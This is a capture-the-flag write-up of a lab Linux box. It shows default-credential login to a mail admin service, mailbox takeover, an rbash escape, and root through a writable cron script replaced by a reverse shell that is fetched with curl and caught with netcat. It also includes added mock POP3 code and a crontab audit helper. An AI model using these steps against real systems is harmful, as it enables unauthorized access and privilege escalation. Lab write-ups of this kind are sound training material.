Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
Let’s see what our first couple of nmap scans come up with: nmap -p- 10.10.10.51 and then nmap -sC -sV -p 22,25,80,110,119,4555 10.10.10.51


A few things look interesting. To start with, port 80 is open so we can probably navigate to that web page. Also, port 4555 is running some service called james-admin. No idea what James is, but we’ll figure it out.
Let’s navigate to the webpage first.

Clicking on links within the website, everything appears to come up as .html, which isn’t super interesting right away (.php is usually more vulnerable).
Let’s see if we can get into that port 4555 using netcat: nc 10.10.10.51 4555

It’s asking for a username and a password, and a quick Google search shows us that the default credentials are root/root, so let’s try that.

That was easy enough. From here I can do a few things, like listusers and even setpassword, thus changing any user’s password and then logging in as them. Let’s run listusers:

Checking Email with Telnet
There are a few ways to read the e-mail on this device. You could use a client like Thunderbird, but I’m going to use Telnet. You can find information on that here: https://mediatemple.net/community/products/dv/204404584/sending-or-viewing-emails-using-telnet
We’ll open up a new terminal window and then log into the mailadmin account via telnet on port 110. We type USER mailadmin, PASS password, and LIST to view the contents of the inbox:

And it doesn’t look like there’s anything in there. Let’s try mindy’s account now, so change her password with setpassword:

And then check if there’s anything in her inbox:

Looks like there are two items. We can use the RETR command (for retrieve) to view each of the e-mails:
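The POP3 exchange used above (USER, PASS, LIST, then RETR for each message id), as an added example that is not part of the original write-up: a tiny mock POP3 server on localhost serving a constructed mailbox, and a poplib client that walks the same four steps. Every byte, the password included, crosses the wire in cleartext, which is exactly why plain telnet to port 110 works; the mock server replies -ERR to a wrong password so the failure path is visible too.

```python
import poplib
import socket
import threading

MAILBOX = [  # constructed sample mailbox; not the box's real mail
    "From: admin\r\nSubject: welcome\r\n\r\nHello mindy, welcome aboard.\r\n",
    "From: admin\r\nSubject: account\r\n\r\nYour account details are attached.\r\n",
]

def _serve_one(conn, users, mailbox):
    """Answer just enough POP3 (RFC 1939) for USER, PASS, LIST, RETR and QUIT."""
    rd, user, cmd = conn.makefile("rb"), None, None
    conn.sendall(b"+OK mock POP3 ready\r\n")
    while cmd != "QUIT":
        # poplib sends commands in upper case, so no normalisation is needed here
        cmd, _, arg = rd.readline().decode().rstrip("\r\n").partition(" ")
        if cmd == "":  # client closed the connection without QUIT
            break
        if cmd == "USER":
            user, reply = arg, "+OK"
        elif cmd == "PASS":  # the password arrives in cleartext, as over telnet
            reply = "+OK logged in" if users.get(user) == arg else "-ERR bad login"
        elif cmd == "LIST":
            sizes = "".join("%d %d\r\n" % (i + 1, len(m)) for i, m in enumerate(mailbox))
            reply = "+OK %d messages\r\n%s." % (len(mailbox), sizes)
        elif cmd == "RETR":
            reply = "+OK\r\n%s." % mailbox[int(arg) - 1]
        else:
            reply = "+OK bye" if cmd == "QUIT" else "-ERR unknown command"
        conn.sendall((reply + "\r\n").encode())
    conn.close()

def start_mock_pop3(users, mailbox):
    """Bind a loopback port and serve the mailbox from a background thread."""
    srv = socket.create_server(("127.0.0.1", 0))
    def loop():
        while True:
            _serve_one(srv.accept()[0], users, mailbox)
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

def fetch_inbox(port, user, password):
    """The same steps as the telnet session: USER, PASS, LIST, then RETR each id."""
    pop = poplib.POP3("127.0.0.1", port, timeout=5)
    pop.user(user)
    pop.pass_(password)  # raises poplib.error_proto on an "-ERR" reply
    _, listing, _ = pop.list()
    messages = [b"\r\n".join(pop.retr(int(e.split()[0]))[1]).decode() for e in listing]
    pop.quit()
    return messages
```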

And it looks like we have some SSH credentials in the 2nd e-mail, nice! So let’s SSH into the box this way with the following command: ssh mindy@10.10.10.51

We have a shell, but there isn’t much we can do with it since it’s restricted:

If we cat /etc/passwd we can see that the mindy user has a default shell of rbash, which is a restricted bash shell.

You can do some Googling to find various ways to get past a restricted bash, and it all depends on what kind of characters are available to be executed, such as the /. In our case, we can re-start our SSH session with the following command: ssh mindy@10.10.10.51 "bash --noprofile" to bypass the loading of the profile. More information is available here: https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=9

From here, viewing the user.txt flag is trivial.
Privilege Escalation
We’re going to try to enumerate the Linux box now. We’ll do that with LinEnum.sh, available here: https://github.com/rebootuser/LinEnum
You’ll want to download it to your Kali box, and then set up the simple HTTP server so you can easily transfer the file to the target machine. Download the LinEnum.sh script and then, from the directory it is in, run python -m SimpleHTTPServer 80

Now, from our shell on our target box, we’ll type curl 10.10.14.30/LinEnum.sh -o LinEnum.sh

And we now see we have the file on our target machine. Time to execute: bash LinEnum.sh -t

There is a lot to look at in the contents of what we just enumerated, to the point of it being overwhelming. One thing should stand out, though:

So this is a file that we can write to but which executes as root, and it’s a Python script. Let’s navigate there and look at it.
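The misconfiguration found here (a root cron job running a script that an unprivileged user can edit) is also something a defender can audit for directly. The helper below is an added example, not part of the original write-up or of LinEnum: audit_cron_scripts takes a crontab file, pulls out every absolute path it references, and reports any that are world-writable or sit in a world-writable, non-sticky directory; demo_setup builds a constructed tree with a world-writable tmp.py to reproduce the finding.

```shell
#!/bin/sh
# Added audit helper, not part of LinEnum: list scripts referenced from a
# crontab file that a non-root user could modify (or replace via its directory).
audit_cron_scripts() {
    # drop comments, blank lines and VAR=value lines; keep absolute-path tokens
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*=)' "$1" |
        tr ' \t' '\n\n' | grep '^/' | sort -u |
        while read -r path; do
            [ -f "$path" ] || continue
            # find -L follows symlinks so an interpreter link is judged by its target
            if [ -n "$(find -L "$path" -prune -perm -0002)" ]; then
                echo "WRITABLE FILE: $path"
            elif [ -n "$(find -L "$(dirname "$path")" -prune -perm -0002 ! -perm -1000)" ]; then
                echo "WRITABLE DIR:  $path"
            fi
        done
}

# Constructed demo tree: a root crontab plus the two scripts it runs; tmp.py is
# left world-writable to reproduce the finding above. Prints the tree's root.
demo_setup() {
    d=$(mktemp -d)
    mkdir -p "$d/opt" "$d/usr/local/bin"
    chmod 755 "$d/opt" "$d/usr/local/bin"
    printf 'echo backup\n' > "$d/usr/local/bin/backup.sh"
    chmod 755 "$d/usr/local/bin/backup.sh"
    printf 'print("cleanup")\n' > "$d/opt/tmp.py"
    chmod 777 "$d/opt/tmp.py"
    cat > "$d/crontab" <<EOF
# constructed root crontab
SHELL=/bin/sh
*/3 * * * * root /usr/bin/python $d/opt/tmp.py
0 2 * * *   root $d/usr/local/bin/backup.sh
EOF
    echo "$d"
}
```

On a real host, point audit_cron_scripts at /etc/crontab and each file under /etc/cron.d; a hit means any local user can run code as root on the next scheduled tick.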

Using Vi or Nano in a shell is a bitch (at least for me), so the easiest way I was able to do this was to create a new tmp.py file on my Kali box and paste in the Python reverse shell code from the PenTest Monkey cheat sheet here: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet making sure to update it with my IP address.

Now, look at the above code carefully: we had to tweak it slightly from what is on the PenTest Monkey website.
Then, set up a NetCat listener on your Kali box with the command nc -lvp 1234 and use Curl (like we did earlier) to copy your new tmp.py file to the /opt directory on your target machine: curl 10.10.14.30/tmp.py -o tmp.py

Now, let’s test our script first. From our target machine’s shell, type python tmp.py
If your script worked, you should have a reverse shell with mindy’s credentials:

That will verify that your script works. Kill that NetCat session, start a new one, and then wait for the tmp.py script to execute as the root user.
